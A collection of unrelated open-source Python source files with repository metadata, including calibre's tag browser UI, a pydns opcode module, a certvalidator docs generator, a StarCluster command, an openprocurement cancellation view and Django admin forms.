partial(db.rename_custom_item, label=cc_label) delete_func = partial(db.delete_custom_item_using_id, label=cc_label) m = self.tags_view.model() if rename_func: for item in to_delete: delete_func(item) m.delete_item_from_all_user_categories(orig_name[item], category) for old_id in to_rename: rename_func(old_id, new_name=unicode(to_rename[old_id])) m.rename_item_in_all_user_categories(orig_name[old_id], category, unicode(to_rename[old_id])) # Clean up the library view self.do_tag_item_renamed() self.tags_view.recount() def do_tag_item_delete(self, category, item_id, orig_name): ''' Delete an item from some category. ''' if not question_dialog(self.tags_view, title=_('Delete item'), msg='<p>'+ _('%s will be deleted from all books. Are you sure?') %orig_name, skip_dialog_name='tag_item_delete', skip_dialog_msg=_('Show this confirmation again')): return db = self.current_db if category == 'tags': delete_func = db.delete_tag_using_id elif category == 'series': delete_func = db.delete_series_using_id elif category == 'publisher': delete_func = db.delete_publisher_using_id else: # must be custom cc_label = db.field_metadata[category]['label'] delete_func = partial(db.delete_custom_item_using_id, label=cc_label) m = self.tags_view.model() if delete_func: delete_func(item_id) m.delete_item_from_all_user_categories(orig_name, category) # Clean up the library view self.do_tag_item_renamed() self.tags_view.recount() def do_tag_item_renamed(self): # Clean up library view and search # get information to redo the selection rows = [r.row() for r in self.library_view.selectionModel().selectedRows()] m = self.library_view.model() ids = [m.id(r) for r in rows] m.refresh(reset=False) m.research() self.library_view.select_rows(ids) # refreshing the tags view happens at the emit()/call() site def do_author_sort_edit(self, parent, id_, select_sort=True, select_link=False): ''' Open the manage authors dialog ''' db = self.library_view.model().db editor = EditAuthorsDialog(parent, db, id_, select_sort, select_link) d = editor.exec_() if d: # Save and restore the current selections. Note that some changes # will cause sort orders to change, so don't bother with attempting # to restore the position. Restoring the state has the side effect # of refreshing book details. with self.library_view.preserve_state(preserve_hpos=False, preserve_vpos=False): for (id2, old_author, new_author, new_sort, new_link) in editor.result: if old_author != new_author: # The id might change if the new author already exists id2 = db.rename_author(id2, new_author) db.set_sort_field_for_author(id2, unicode(new_sort), commit=False, notify=False) db.set_link_field_for_author(id2, unicode(new_link), commit=False, notify=False) db.commit() self.library_view.model().refresh() self.tags_view.recount() def drag_drop_finished(self, ids): self.library_view.model().refresh_ids(ids) # }}} class TagBrowserWidget(QWidget): # {{{ def __init__(self, parent): QWidget.__init__(self, parent) self.parent = parent self._layout = QVBoxLayout() self.setLayout(self._layout) self._layout.setContentsMargins(0,0,0,0) # Set up the find box & button search_layout = QHBoxLayout() self._layout.addLayout(search_layout) self.item_search = HistoryLineEdit(parent) self.item_search.setMinimumContentsLength(5) self.item_search.setSizeAdjustPolicy(self.item_search.AdjustToMinimumContentsLengthWithIcon) try: self.item_search.lineEdit().setPlaceholderText( _('Find item in tag browser')) except: pass # Using Qt < 4.7 self.item_search.setToolTip(_( 'Search for items. This is a "contains" search; items containing the\n' 'text anywhere in the name will be found. You can limit the search\n' 'to particular categories using syntax similar to search. For example,\n' 'tags:foo will find foo in any tag, but not in authors etc. Entering\n' '*foo will filter all categories at once, showing only those items\n' 'containing the text "foo"')) search_layout.addWidget(self.item_search) # Not sure if the shortcut should be translatable ... sc = QShortcut(QKeySequence(_('ALT+f')), parent) sc.activated.connect(self.set_focus_to_find_box) self.search_button = QToolButton() self.search_button.setText(_('F&ind')) self.search_button.setToolTip(_('Find the first/next matching item')) search_layout.addWidget(self.search_button) self.expand_button = QToolButton() self.expand_button.setText('-') self.expand_button.setToolTip(_('Collapse all categories')) search_layout.addWidget(self.expand_button) search_layout.setStretch(0, 10) search_layout.setStretch(1, 1) search_layout.setStretch(2, 1) self.current_find_position = None self.search_button.clicked.connect(self.find) self.item_search.initialize('tag_browser_search') self.item_search.lineEdit().returnPressed.connect(self.do_find) self.item_search.lineEdit().textEdited.connect(self.find_text_changed) self.item_search.activated[QString].connect(self.do_find) self.item_search.completer().setCaseSensitivity(Qt.CaseSensitive) parent.tags_view = TagsView(parent) self.tags_view = parent.tags_view self.expand_button.clicked.connect(self.tags_view.collapseAll) self._layout.addWidget(parent.tags_view) # Now the floating 'not found' box l = QLabel(self.tags_view) self.not_found_label = l l.setFrameStyle(QFrame.StyledPanel) l.setAutoFillBackground(True) l.setText('<p><b>'+_('No More Matches.</b><p> Click Find again to go to first match')) l.setAlignment(Qt.AlignVCenter) l.setWordWrap(True) l.resize(l.sizeHint()) l.move(10,20) l.setVisible(False) self.not_found_label_timer = QTimer() self.not_found_label_timer.setSingleShot(True) self.not_found_label_timer.timeout.connect(self.not_found_label_timer_event, type=Qt.QueuedConnection) parent.alter_tb = l = QPushButton(parent) l.setText(_('Alter Tag Browser')) l.setIcon(QIcon(I('tags.png'))) l.m = QMenu() l.setMenu(l.m) self._layout.addWidget(l) sb = l.m.addAction(_('Sort by')) sb.m = l.sort_menu = QMenu(l.m) sb.setMenu(sb.m) sb.bg = QActionGroup(sb) # Must be in the same order as db2.CATEGORY_SORTS for i, x in enumerate((_('Sort by name'), _('Sort by popularity'), _('Sort by average rating'))): a = sb.m.addAction(x) sb.bg.addAction(a) a.setCheckable(True) if i == 0: a.setChecked(True) sb.setToolTip( _('Set the sort order for entries in the Tag Browser')) sb.setStatusTip(sb.toolTip()) ma = l.m.addAction(_('Search type when selecting multiple items')) ma.m = l.match_menu = QMenu(l.m) ma.setMenu(ma.m) ma.ag = QActionGroup(ma) # Must be in the same order as db2.MATCH_TYPE for i, x in enumerate((_('Match any of the items'), _('Match all of the items'))): a = ma.m.addAction(x) ma.ag.addAction(a) a.setCheckable(True) if i == 0: a.setChecked(True) ma.setToolTip( _('When selecting multiple entries in the Tag Browser ' 'match any or all of them')) ma.setStatusTip(ma.toolTip()) mt = l.m.addAction(_('Manage authors, tags, etc')) mt.setToolTip(_('All of these category_managers are available by right-clicking ' 'on items in the tag browser above')) mt.m = l.manage_menu = QMenu(l.m) mt.setMenu(mt.m) # self.leak_test_timer = QTimer(self) # self.leak_test_timer.timeout.connect(self.test_for_leak) # self.leak_test_timer.start(5000) def set_pane_is_visible(self, to_what): self.tags_view.set_pane_is_visible(to_what) def find_text_changed(self, str): self.current_find_position = None def set_focus_to_find_box(self): self.item_search.setFocus() self.item_search.lineEdit().selectAll() def do_find(self, str=None): self.current_find_position = None self.find() def find(self): model = self.tags_view.model() model.clear_boxed() txt = unicode(self.item_search.currentText()).strip() if txt.startswith('*'): model.set_categories_filter(txt[1:]) self.tags_view.recount() self.current_find_position = None return if model.get_categories_filter(): model.set_categories_filter(None) self.tags_view.recount() self.current_find_position = None if not txt: return self.item_search.lineEdit().blockSignals(True) self.search_button.setFocus(True) self.item_search.lineEdit().blockSignals(False) key = None colon = txt.rfind(':') if len(txt) > 2 else 0 if colon > 0: key = self.parent.library_view.model().db.\ field_metadata.search_term_to_field_key(txt[:colon]) txt = txt[colon+1:] self.current_find_position = \ model.find_item_node(key, txt, self.current_find_position) if self.current_find_position: self.tags_view.show_item_at_path(self.current_find_position, box=True) elif self.item_search.text(): self.not_found_label.setVisible(True) if self.tags_view.verticalScrollBar().isVisible(): sbw = self.tags_view.verticalScrollBar().width() else: sbw = 0 width = self.width() - 8 - sbw height = self.not_found_label.heightForWidth(width) + 20 self.not_found_label.resize(width, height) self.not_found_label.move(4, 10) self.not_found_label_timer.start(2000) def not_found_label_timer_event(self): self.not_found_label.setVisible(False) # }}}
pra85/calibre
src/calibre/gui2/tag_browser/ui.py
Python
gpl-3.0
21,727
""" $Id: Opcode.py,v 1.6.2.1 2011/03/16 20:06:39 customdesigned Exp $ This file is part of the pydns project. Homepage: http://pydns.sourceforge.net This code is covered by the standard Python License. See LICENSE for details. Opcode values in message header. RFC 1035, 1996, 2136. """ QUERY = 0 IQUERY = 1 STATUS = 2 NOTIFY = 4 UPDATE = 5 # Construct reverse mapping dictionary _names = dir() opcodemap = {} for _name in _names: if _name[0] != '_': opcodemap[eval(_name)] = _name def opcodestr(opcode): if opcodemap.has_key(opcode): return opcodemap[opcode] else: return `opcode` # # $Log: Opcode.py,v $ # Revision 1.6.2.1 2011/03/16 20:06:39 customdesigned # Refer to explicit LICENSE file. # # Revision 1.6 2002/04/23 10:51:43 anthonybaxter # Added UPDATE, NOTIFY. # # Revision 1.5 2002/03/19 12:41:33 anthonybaxter # tabnannied and reindented everything. 4 space indent, no tabs. # yay. # # Revision 1.4 2002/03/19 12:26:13 anthonybaxter # death to leading tabs. # # Revision 1.3 2001/08/09 09:08:55 anthonybaxter # added identifying header to top of each file # # Revision 1.2 2001/07/19 06:57:07 anthony # cvs keywords added # #
g-fleischer/wtfy
trackingserver/thirdparty/pydns/DNS/Opcode.py
Python
gpl-3.0
1,174
# -*- coding: utf-8 -*- # Copyright (c) 2017 Ericsson AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from calvin.runtime.south.calvinsys import base_calvinsys_object class BasePlay(base_calvinsys_object.BaseCalvinsysObject): """ Play audio file """ init_schema = { "type": "object", "properties": { "audiofile": { "description": "location of file to play", "type": "string" } }, "description": "Set up audio player" } can_write_schema = { "description": "True iff audio is ready to be played", "type": "boolean" } write_schema = { "description": "Play specified audio file, either specified in argument or at init", "type": ["null", "boolean", "string"] }
EricssonResearch/calvin-base
calvinextras/calvinsys/media/audio/play/BasePlay.py
Python
apache-2.0
1,328
# -*- coding: utf-8 -*- # Generated by Django 1.9 on 2016-01-26 21:14 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('documents', '0006_auto_20160123_0430'), ] operations = [ migrations.AddField( model_name='tag', name='match', field=models.CharField(blank=True, max_length=256), ), migrations.AddField( model_name='tag', name='matching_algorithm', field=models.PositiveIntegerField(blank=True, choices=[(1, 'Any'), (2, 'All'), (3, 'Literal'), (4, 'Regular Expression')], help_text='Which algorithm you want to use when matching text to the OCR\'d PDF. Here, "any" looks for any occurrence of any word provided in the PDF, while "all" requires that every word provided appear in the PDF, albeit not in the order provided. A "literal" match means that the text you enter must appear in the PDF exactly as you\'ve entered it, and "regular expression" uses a regex to match the PDF. If you don\'t know what a regex is, you probably don\'t want this option.', null=True), ), migrations.AlterField( model_name='tag', name='colour', field=models.PositiveIntegerField(choices=[(1, '#a6cee3'), (2, '#1f78b4'), (3, '#b2df8a'), (4, '#33a02c'), (5, '#fb9a99'), (6, '#e31a1c'), (7, '#fdbf6f'), (8, '#ff7f00'), (9, '#cab2d6'), (10, '#6a3d9a'), (11, '#b15928'), (12, '#000000'), (13, '#cccccc')], default=1), ), ]
fwilk/paperless
src/documents/migrations/0007_auto_20160126_2114.py
Python
gpl-3.0
1,579
# coding: utf-8 from __future__ import unicode_literals, division, absolute_import, print_function import re import os import ast import _ast import textwrap import CommonMark from collections import OrderedDict cur_dir = os.path.dirname(__file__) project_dir = os.path.abspath(os.path.join(cur_dir, '..')) docs_dir = os.path.join(project_dir, 'docs') module_name = 'certvalidator' # Maps a markdown document to a Python source file to look in for # class/method/function docstrings MD_SOURCE_MAP = { 'docs/api.md': [ 'certvalidator/__init__.py', 'certvalidator/context.py', ], } # A search/replace dictionary to modify docstring contents before generating # markdown from them definition_replacements = {} if hasattr(CommonMark, 'DocParser'): raise EnvironmentError("CommonMark must be version 0.6.0 or newer") def _get_func_info(docstring, def_lineno, code_lines, prefix): """ Extracts the function signature and description of a Python function :param docstring: A unicode string of the docstring for the function :param def_lineno: An integer line number that function was defined on :param code_lines: A list of unicode string lines from the source file the function was defined in :param prefix: A prefix to prepend to all output lines :return: A 2-element tuple: - [0] A unicode string of the function signature with a docstring of parameter info - [1] A markdown snippet of the function description """ def_index = def_lineno - 1 definition = code_lines[def_index] definition = definition.rstrip() while not definition.endswith(':'): def_index += 1 definition += '\n' + code_lines[def_index].rstrip() definition = textwrap.dedent(definition).rstrip(':') definition = definition.replace('\n', '\n' + prefix) description = '' found_colon = False params = '' for line in docstring.splitlines(): if line and line[0] == ':': found_colon = True if not found_colon: if description: description += '\n' description += line else: if params: params += '\n' params += line description = description.strip() description_md = '' if description: description_md = '%s%s' % (prefix, description.replace('\n', '\n' + prefix)) description_md = re.sub('\n>(\\s+)\n', '\n>\n', description_md) params = params.strip() if params: definition += (':\n%s """\n%s ' % (prefix, prefix)) definition += params.replace('\n', '\n%s ' % prefix) definition += ('\n%s """' % prefix) definition = re.sub('\n>(\\s+)\n', '\n>\n', definition) for search, replace in definition_replacements.items(): definition = definition.replace(search, replace) return (definition, description_md) def _find_sections(md_ast, sections, last, last_class, total_lines=None): """ Walks through a CommonMark AST to find section headers that delineate content that should be updated by this script :param md_ast: The AST of the markdown document :param sections: A dict to store the start and end lines of a section. The key will be a two-element tuple of the section type ("class", "function", "method" or "attribute") and identifier. The values are a two-element tuple of the start and end line number in the markdown document of the section. :param last: A dict containing information about the last section header seen. Includes the keys "type_name", "identifier", "start_line". :param last_class: A unicode string of the name of the last class found - used when processing methods and attributes. :param total_lines: An integer of the total number of lines in the markdown document - used to work around a bug in the API of the Python port of CommonMark """ def child_walker(node): for child, entering in node.walker(): if child == node: continue yield child, entering for child, entering in child_walker(md_ast): if child.t == 'heading': start_line = child.sourcepos[0][0] if child.level == 2: if last: sections[(last['type_name'], last['identifier'])] = (last['start_line'], start_line - 1) last.clear() if child.level in set([3, 5]): heading_elements = [] for heading_child, _ in child_walker(child): heading_elements.append(heading_child) if len(heading_elements) != 2: continue first = heading_elements[0] second = heading_elements[1] if first.t != 'code': continue if second.t != 'text': continue type_name = second.literal.strip() identifier = first.literal.strip().replace('()', '').lstrip('.') if last: sections[(last['type_name'], last['identifier'])] = (last['start_line'], start_line - 1) last.clear() if type_name == 'function': if child.level != 3: continue if type_name == 'class': if child.level != 3: continue last_class.append(identifier) if type_name in set(['method', 'attribute']): if child.level != 5: continue identifier = last_class[-1] + '.' + identifier last.update({ 'type_name': type_name, 'identifier': identifier, 'start_line': start_line, }) elif child.t == 'block_quote': find_sections(child, sections, last, last_class) if last: sections[(last['type_name'], last['identifier'])] = (last['start_line'], total_lines) find_sections = _find_sections def walk_ast(node, code_lines, sections, md_chunks): """ A callback used to walk the Python AST looking for classes, functions, methods and attributes. Generates chunks of markdown markup to replace the existing content. :param node: An _ast module node object :param code_lines: A list of unicode strings - the source lines of the Python file :param sections: A dict of markdown document sections that need to be updated. The key will be a two-element tuple of the section type ("class", "function", "method" or "attribute") and identifier. The values are a two-element tuple of the start and end line number in the markdown document of the section. :param md_chunks: A dict with keys from the sections param and the values being a unicode string containing a chunk of markdown markup. """ if isinstance(node, _ast.FunctionDef): key = ('function', node.name) if key not in sections: return docstring = ast.get_docstring(node) def_lineno = node.lineno + len(node.decorator_list) definition, description_md = _get_func_info(docstring, def_lineno, code_lines, '> ') md_chunk = textwrap.dedent(""" ### `%s()` function > ```python > %s > ``` > %s """).strip() % ( node.name, definition, description_md ) + "\n" md_chunks[key] = md_chunk elif isinstance(node, _ast.ClassDef): if ('class', node.name) not in sections: return for subnode in node.body: if isinstance(subnode, _ast.FunctionDef): node_id = node.name + '.' + subnode.name method_key = ('method', node_id) is_method = method_key in sections attribute_key = ('attribute', node_id) is_attribute = attribute_key in sections is_constructor = subnode.name == '__init__' if not is_constructor and not is_attribute and not is_method: continue docstring = ast.get_docstring(subnode) def_lineno = subnode.lineno + len(subnode.decorator_list) if not docstring: continue if is_method or is_constructor: definition, description_md = _get_func_info(docstring, def_lineno, code_lines, '> > ') if is_constructor: key = ('class', node.name) class_docstring = ast.get_docstring(node) or '' class_description = textwrap.dedent(class_docstring).strip() if class_description: class_description_md = "> %s\n>" % (class_description.replace("\n", "\n> ")) else: class_description_md = '' md_chunk = textwrap.dedent(""" ### `%s()` class %s > ##### constructor > > > ```python > > %s > > ``` > > %s """).strip() % ( node.name, class_description_md, definition, description_md ) md_chunk = md_chunk.replace('\n\n\n', '\n\n') else: key = method_key md_chunk = textwrap.dedent(""" > > ##### `.%s()` method > > > ```python > > %s > > ``` > > %s """).strip() % ( subnode.name, definition, description_md ) if md_chunk[-5:] == '\n> >\n': md_chunk = md_chunk[0:-5] else: key = attribute_key description = textwrap.dedent(docstring).strip() description_md = "> > %s" % (description.replace("\n", "\n> > ")) md_chunk = textwrap.dedent(""" > > ##### `.%s` attribute > %s """).strip() % ( subnode.name, description_md ) md_chunks[key] = re.sub('[ \\t]+\n', '\n', md_chunk.rstrip()) elif isinstance(node, _ast.If): for subast in node.body: walk_ast(subast, code_lines, sections, md_chunks) for subast in node.orelse: walk_ast(subast, code_lines, sections, md_chunks) def run(): """ Looks through the docs/ dir and parses each markdown document, looking for sections to update from Python docstrings. Looks for section headers in the format: - ### `ClassName()` class - ##### `.method_name()` method - ##### `.attribute_name` attribute - ### `function_name()` function The markdown content following these section headers up until the next section header will be replaced by new markdown generated from the Python docstrings of the associated source files. By default maps docs/{name}.md to {modulename}/{name}.py. Allows for custom mapping via the MD_SOURCE_MAP variable. """ print('Updating API docs...') md_files = [] for root, _, filenames in os.walk(docs_dir): for filename in filenames: if not filename.endswith('.md'): continue md_files.append(os.path.join(root, filename)) parser = CommonMark.Parser() for md_file in md_files: md_file_relative = md_file[len(project_dir) + 1:] if md_file_relative in MD_SOURCE_MAP: py_files = MD_SOURCE_MAP[md_file_relative] py_paths = [os.path.join(project_dir, py_file) for py_file in py_files] else: py_files = [os.path.basename(md_file).replace('.md', '.py')] py_paths = [os.path.join(project_dir, module_name, py_files[0])] if not os.path.exists(py_paths[0]): continue with open(md_file, 'rb') as f: markdown = f.read().decode('utf-8') original_markdown = markdown md_lines = list(markdown.splitlines()) md_ast = parser.parse(markdown) last_class = [] last = {} sections = OrderedDict() find_sections(md_ast, sections, last, last_class, markdown.count("\n") + 1) md_chunks = {} for index, py_file in enumerate(py_files): py_path = py_paths[index] with open(os.path.join(py_path), 'rb') as f: code = f.read().decode('utf-8') module_ast = ast.parse(code, filename=py_file) code_lines = list(code.splitlines()) for node in ast.iter_child_nodes(module_ast): walk_ast(node, code_lines, sections, md_chunks) added_lines = 0 def _replace_md(key, sections, md_chunk, md_lines, added_lines): start, end = sections[key] start -= 1 start += added_lines end += added_lines new_lines = md_chunk.split('\n') added_lines += len(new_lines) - (end - start) # Ensure a newline above each class header if start > 0 and md_lines[start][0:4] == '### ' and md_lines[start - 1][0:1] == '>': added_lines += 1 new_lines.insert(0, '') md_lines[start:end] = new_lines return added_lines for key in sections: if key not in md_chunks: raise ValueError('No documentation found for %s' % key[1]) added_lines = _replace_md(key, sections, md_chunks[key], md_lines, added_lines) markdown = '\n'.join(md_lines).strip() + '\n' if original_markdown != markdown: with open(md_file, 'wb') as f: f.write(markdown.encode('utf-8')) if __name__ == '__main__': run()
kak-bo-che/certvalidator
dev/api_docs.py
Python
mit
14,979
import asyncio from concurrent.futures import ProcessPoolExecutor print('running async test') def say_boo(): i = 0 while True: print('...boo {0}'.format(i)) i += 1 def say_baa(): i = 0 while True: print('...baa {0}'.format(i)) i += 1 if __name__ == "__main__": executor = ProcessPoolExecutor(2) loop = asyncio.get_event_loop() boo = asyncio.ensure_future(loop.run_in_executor(executor, say_boo)) baa = asyncio.ensure_future(loop.run_in_executor(executor, say_baa)) loop.run_forever()
fs714/ipyexample
asynchronous/py36/asyncio/example02.py
Python
apache-2.0
557
# Copyright 2009-2014 Justin Riley # # This file is part of StarCluster. # # StarCluster is free software: you can redistribute it and/or modify it under # the terms of the GNU Lesser General Public License as published by the Free # Software Foundation, either version 3 of the License, or (at your option) any # later version. # # StarCluster is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # details. # # You should have received a copy of the GNU Lesser General Public License # along with StarCluster. If not, see <http://www.gnu.org/licenses/>. import glob from starcluster import exception from completers import ClusterCompleter class CmdGet(ClusterCompleter): """ get [options] <cluster_tag> [<remote_file_or_dir> ...] <local_destination> Copy one or more files from a running cluster to your local machine Examples: # Copy a file or dir from the master as root $ starcluster get mycluster /path/on/remote/server /local/file/or/dir # Copy a file and a dir from the master as root $ starcluster get mycluster /remote/file /remote/dir /local/dir # Copy a file or dir from the master as normal user $ starcluster get mycluster --user myuser /remote/path /local/path # Copy a file or dir from a node (node001 in this example) $ starcluster get mycluster --node node001 /remote/path /local/path """ names = ['get'] def addopts(self, parser): parser.add_option("-u", "--user", dest="user", default=None, help="Transfer files as USER ") parser.add_option("-n", "--node", dest="node", default="master", help="Transfer files from NODE (defaults to master)") def execute(self, args): if len(args) < 3: self.parser.error("please specify a cluster, remote file or " + "directory, and a local destination path") ctag = args[0] lpath = args[-1] rpaths = args[1:-1] cl = self.cm.get_cluster(ctag, load_receipt=False) node = cl.get_node(self.opts.node) if self.opts.user: node.ssh.switch_user(self.opts.user) for rpath in rpaths: if not glob.has_magic(rpath) and not node.ssh.path_exists(rpath): raise exception.BaseException( "Remote file or directory does not exist: %s" % rpath) node.ssh.get(rpaths, lpath)
cjh1/StarCluster
starcluster/commands/get.py
Python
gpl-3.0
2,628
#!/usr/bin/env python3 import sys import os import path_utils import fsquery import mvtools_exception def puaq(): print("Usage: %s folder" % path_utils.basename_filtered(__file__)) sys.exit(1) def insert_pragma(path): exts = ["h"] v, r = fsquery.makecontentlist(path, True, False, True, False, False, False, True, exts) if not v: raise mvtools_exception.mvtools_exception(r) ret = r pragma_str = "\n#ifdef __GNUC__\n#pragma GCC system_header\n#endif\n" failed_bucket = [] #currently unused for r in ret: contents = pragma_str with open(r) as f: contents += f.read() with open(r, "w") as f: f.write(contents) if len(failed_bucket) > 0: print("There were failures!") for fb in failed_bucket: print("%s failed." % fb) else: print("All done - no errors detected") if __name__ == "__main__": if len(sys.argv) < 2: puaq() else: insert_pragma(sys.argv[1])
mvendra/mvtools
insert_pragma.py
Python
mit
1,020
#!/usr/bin/python # -*- coding: utf-8 -*- import os import codecs from setuptools import setup with codecs.open( os.path.join(os.path.dirname(__file__), 'README.rst'), 'r', 'utf8', ) as ld_file: long_description = ld_file.read() setup ( name = 'doit-cmd', version = '0.1.0', author = 'Eduardo Naufel Schettino', author_email = 'schettino72@gmail.com', description = 'Helper to create doit tasks that execute a command', long_description = long_description, url = 'https://github.com/pydoit/doit-cmd/', keywords = ['doit',], platforms = ['any'], license = 'MIT', py_modules = ['doitcmd'], install_requires = ['doit'], classifiers = [ 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Topic :: Software Development :: Libraries', 'Topic :: Software Development :: Libraries :: Python Modules', ] )
pydoit/doit-cmd
setup.py
Python
mit
1,238
# -*- coding: utf-8 -*- from openprocurement.api.utils import ( json_view, context_unpack, APIResource, get_now, raise_operation_error ) from openprocurement.tender.core.utils import ( save_tender, optendersresource, apply_patch, ) from openprocurement.tender.belowthreshold.utils import ( add_next_award ) from openprocurement.tender.core.validation import ( validate_cancellation_data, validate_patch_cancellation_data, ) @optendersresource(name='belowThreshold:Tender Cancellations', collection_path='/tenders/{tender_id}/cancellations', path='/tenders/{tender_id}/cancellations/{cancellation_id}', procurementMethodType='belowThreshold', description="Tender cancellations") class TenderCancellationResource(APIResource): def cancel_tender(self): tender = self.request.validated['tender'] if tender.status in ['active.tendering', 'active.auction']: tender.bids = [] tender.status = 'cancelled' def cancel_lot(self, cancellation=None): if not cancellation: cancellation = self.context tender = self.request.validated['tender'] [setattr(i, 'status', 'cancelled') for i in tender.lots if i.id == cancellation.relatedLot] statuses = set([lot.status for lot in tender.lots]) if statuses == set(['cancelled']): self.cancel_tender() elif not statuses.difference(set(['unsuccessful', 'cancelled'])): tender.status = 'unsuccessful' elif not statuses.difference(set(['complete', 'unsuccessful', 'cancelled'])): tender.status = 'complete' if tender.status == 'active.auction' and all([ i.auctionPeriod and i.auctionPeriod.endDate for i in self.request.validated['tender'].lots if i.numberOfBids > 1 and i.status == 'active' ]): add_next_award(self.request) def validate_cancellation(self, operation): """ TODO move validators This class is inherited in openua, openeu, limited packages, but validate_cancellation function has different validators. For now, we have no way to use different validators on methods according to procedure type. """ tender = self.request.validated['tender'] if tender.status in ['complete', 'cancelled', 'unsuccessful']: raise_operation_error(self.request, 'Can\'t {} cancellation in current ({}) tender status'.format(operation, tender.status)) cancellation = self.request.validated['cancellation'] cancellation.date = get_now() if any([i.status != 'active' for i in tender.lots if i.id == cancellation.relatedLot]): raise_operation_error(self.request, 'Can {} cancellation only in active lot status'.format(operation)) return True @json_view(content_type="application/json", validators=(validate_cancellation_data,), permission='edit_tender') def collection_post(self): """Post a cancellation """ if not self.validate_cancellation('add'): return cancellation = self.request.validated['cancellation'] cancellation.date = get_now() if cancellation.relatedLot and cancellation.status == 'active': self.cancel_lot(cancellation) elif cancellation.status == 'active': self.cancel_tender() self.request.context.cancellations.append(cancellation) if save_tender(self.request): self.LOGGER.info('Created tender cancellation {}'.format(cancellation.id), extra=context_unpack(self.request, {'MESSAGE_ID': 'tender_cancellation_create'}, {'cancellation_id': cancellation.id})) self.request.response.status = 201 self.request.response.headers['Location'] = self.request.route_url('{}:Tender Cancellations'.format(self.request.validated['tender'].procurementMethodType), tender_id=self.request.validated['tender_id'], cancellation_id=cancellation.id) return {'data': cancellation.serialize("view")} @json_view(permission='view_tender') def collection_get(self): """List cancellations """ return {'data': [i.serialize("view") for i in self.request.validated['tender'].cancellations]} @json_view(permission='view_tender') def get(self): """Retrieving the cancellation """ return {'data': self.request.validated['cancellation'].serialize("view")} @json_view(content_type="application/json", validators=(validate_patch_cancellation_data,), permission='edit_tender') def patch(self): """Post a cancellation resolution """ if not self.validate_cancellation('update'): return apply_patch(self.request, save=False, src=self.request.context.serialize()) if self.request.context.relatedLot and self.request.context.status == 'active': self.cancel_lot() elif self.request.context.status == 'active': self.cancel_tender() if save_tender(self.request): self.LOGGER.info('Updated tender cancellation {}'.format(self.request.context.id), extra=context_unpack(self.request, {'MESSAGE_ID': 'tender_cancellation_patch'})) return {'data': self.request.context.serialize("view")}
openprocurement/openprocurement.tender.belowthreshold
openprocurement/tender/belowthreshold/views/cancellation.py
Python
apache-2.0
5,411
# ~*~ coding: utf-8 ~*~ from django import forms from datetimewidget.widgets import DateTimeWidget from django.utils.translation import ugettext_lazy as _ from django.forms import formset_factory from django.forms.models import modelformset_factory, inlineformset_factory from virtenviro.content.models import * import codecs from django.conf import settings __author__ = 'Kamo Petrosyan' class PagesAdminForm(forms.ModelForm): def __init__(self, *args, **kwargs): super(PagesAdminForm, self).__init__(*args, **kwargs) self.fields['parent'].queryset = Page.objects.filter(is_category=True) class Meta: model = Page exclude = ['last_modified'] widgets = { 'title': forms.TextInput(attrs={'placeholder': _('Title'), 'class': "form-control"}), 'slug': forms.TextInput(attrs={'placeholder': _('Slug'), 'class': "form-control"}), 'template': forms.Select(attrs={'class': "form-control"}), 'parent': forms.Select(attrs={'class': "form-control"}), 'ordering': forms.NumberInput(attrs={'class': "form-control", 'min': 0}), 'pub_datetime': DateTimeWidget(attrs={'id': "id_pub_datetime"}, usel10n=True, bootstrap_version=3), 'last_modified_by': forms.Select(attrs={'disabled': 'disabled', 'class': 'form-control disabled'}) } def clean_parent(self): parent = self.cleaned_data.get('parent') if not parent: parent = None return parent class ContentAdminForm(forms.ModelForm): class Meta: model = Content widgets = { 'title': forms.TextInput(attrs={'placeholder': _('Title'), 'class': "form-control"}), 'h1': forms.TextInput(attrs={'placeholder': _('H1'), 'class': "form-control"}), 'intro': forms.Textarea(attrs={'placeholder': _('Intro text'), 'class': 'form-control', 'rows': 4}), 'content': forms.Textarea(attrs={'placeholder': _('Intro text'), 'class': 'ckeditor'}), 'template': forms.Select(attrs={'class': "form-control"}), 'language': forms.Select(attrs={'class': "form-control disabled"}), 'meta_title': forms.TextInput(attrs={'placeholder': _('Meta title'), 'class': "form-control"}), 'meta_keywords': forms.Textarea( attrs={'placeholder': _('Meta keywords'), 'class': 'form-control', 'rows': 2}), 'meta_description': forms.Textarea( attrs={'placeholder': _('Meta description'), 'class': 'form-control', 'rows': 2}), 'author': forms.Select(attrs={'class': 'form-control'}), 'pub_datetime': DateTimeWidget(attrs={'class': 'form-control'}, usel10n=True, bootstrap_version=3), 'last_modified_by': forms.Select(attrs={'disabled': 'disabled', 'class': 'form-control disabled'}) } exclude = ['parent'] class Media: css = {'all': ('/static/css/ckeditor.css',)} js = ( '/static/ckeditor/ckeditor.js', '/static/filebrowser/js/FB_CKEditor.js', '/static/js/ckeditor.js', ) class TemplateAdminForm(forms.ModelForm): code = forms.CharField(widget=forms.Textarea(attrs={'placeholder': _('Code'), 'class': 'form-control', 'rows': 20})) def __init__(self, *args, **kwargs): super(TemplateAdminForm, self).__init__(*args, **kwargs) try: template_file = codecs.open(os.path.join(settings.TEMPLATES[0]['DIRS'][0], self.instance.filename), 'r', 'utf-8') self.fields['code'].initial = template_file.read() template_file.close() except: self.fields['code'].initial = '' def save(self, force_insert=False, force_update=False, commit=True): instance = super(TemplateAdminForm, self).save(commit=False) code = self.cleaned_data['code'] template_file = codecs.open(os.path.join(settings.TEMPLATES[0]['DIRS'][0], self.cleaned_data['filename']), 'w', 'utf-8') template_file.write(code) template_file.close() if commit: instance.save() return instance class Meta: model = Template widgets = { 'title': forms.TextInput(attrs={'placeholder': _('Title'), 'class': "form-control"}), 'filename': forms.TextInput(attrs={'placeholder': _('File name'), 'class': "form-control"}), 'parent': forms.Select(attrs={'class': "form-control"}), } fields = ['title', 'filename', 'parent', 